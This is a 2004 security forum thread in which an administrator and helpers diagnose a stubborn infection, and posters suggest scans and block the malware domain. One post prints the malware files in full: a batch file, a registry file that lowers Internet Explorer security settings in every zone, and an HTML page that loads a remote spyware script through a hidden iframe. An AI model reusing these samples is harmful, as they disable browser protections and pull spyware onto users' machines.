-
July 26th, 2004, 08:19 PM
#1
Junior Member
Possible infection, with odd list of running processes
Good afternoon everone,
I've got a remote "super user" who managed to sneak her infected machine on the network, and suddenly, I know exactly which machines got overlooked during the last security scan.
All but one have been cleaned up, but the remaining infected machine is proving to be a tough nut to crack. I've run Sophos and Trend Micro AV against in, followed by a few rounds of AdAware and SpyBot, mixed in with a little CWEBSHREADER. The problems are still there however, and I have identified the following list of files that seem a bit suspicious.
svchosting.exe
command.eve
wserv32.exe
x.bat
yea.reg
staff.html
According to the searches I've done, these files all belong to a number of different (old) virus variants, but I can't seem to find anything that leaves all of the above.
Any thoughts?
-
July 26th, 2004, 08:28 PM
#2
Sounds like youve got the scanning tools you need. Have you run those scans in "safe mode" (F8 on boot)? Are you positive that adaware, AVs, and spybot are completely updated? Search for that staff.html file, don't execute it, but read its contents with a plaintext editor like notepad. Same deal with x.bat. It'll help you fingerprint the malware. wserv32.exe looks like it could be trying to act as a webserver, by the name of it. Try browsing to the infected machines address with all scripting off. Obviously I haven't googled the names of those files, but let us know after you have those steps handled.
Also try AVG antivirus, bitdefender AV, ClamAV as other optional scanners.
-
July 26th, 2004, 10:50 PM
#3
Is the Box fully patched?
wserv32 could be related to this..
http://www.trendmicro.com/vinfo/viru...e=WORM_RBOT.AF
http://www.arkateq.com/virus/698.htm
There are a few "toys" that use x.bat staff.html yea.reg have only seen listings with these no actual information as to what they were..
Command.eve may be related to a image editing prog EVE
http://www.dpspro.com/tcs_commands/tcsos_eve.html
Would be interesting to have a look at the code behind a couple of those..
Cheers
"Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
July 27th, 2004, 05:15 PM
#4
Junior Member
Ok, as per Soda's request, I've managed to isolate a few of the files and I'm posting their contents.
First, x.bat
@echo off
REGEDIT.EXE /S YEA.REG
staff.html
x.html
exit
Pretty damn simple. So, lets see what yea.reg does.
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
"http"=dword:00000000
I'm not familiar with the way Windows goes about it's registry business, but it looks like these keys are attempting to alter the way Internet Explorer handles it's predefined security zones. Most likely in an attempt to make it eaiser for other bits of malware to gain access to the machine. Just speculation in my part though.
Finally, staff.html
#<html>
#<title> .:[ y E a K u K z ]:. </title>
#<center>
#<body>
#<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
#<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
#<script language="JavaScript">
#mtrslib_uid = '1677';
#mtrslib_retry = 1;
#mt_set_onload();
#</script>
#</body>
#</center>
#</html>
Not a clue whatmtrslib2.js does, but I've added that domain to the host file on the local machines here, and have it pointed to an internal page.
Any additional thoughts?
-
July 27th, 2004, 10:20 PM
#5
didn't find my notes at work regarding where I had encountered X.bat and friends.
But I did find mtrslib2.js source
Found this in the body: "MediaTicketsInstallerDemo"
full JS attached
Sry I can't offer better help..
Cheers
Edit: HAd a machine late yesterday that had MediaTickets installed, as there appeared to be no associated uninstaller or menu listing..oh and the customer didn't know what it was.. I removed it... This same machine had a file "USER32.EXE" I think it was in the C:\Windows\System folder.. Any scan I ran on this file was clean.. did a quick check using Fileanalyser.. and it appears to be a component of a Mass mailer or a phone home bug..
Check your system.INI and registry for references to this file.. it loads with explorer.exe
Becareful.. user32.dll is a system file don't confuse it with this file..
"Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
July 27th, 2004, 10:27 PM
#6
Junior Member
Originally posted here by Und3ertak3r
didn't find my notes at work regarding where I had encountered X.bat and friends.
But I did find mtrslib2.js source
Found this in the body: "MediaTicketsInstallerDemo"
full JS attached
Sry I can't offer better help..
Cheers
This is great, thank you. I don't have the tools to pull .js apart, so I'm very happy with this.
Looks to be some sort of spyware, but I'm no programmer, so...
Hehe, turns out the kids who wrote this put their real phone number on the domain contact info for mt-download.com.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|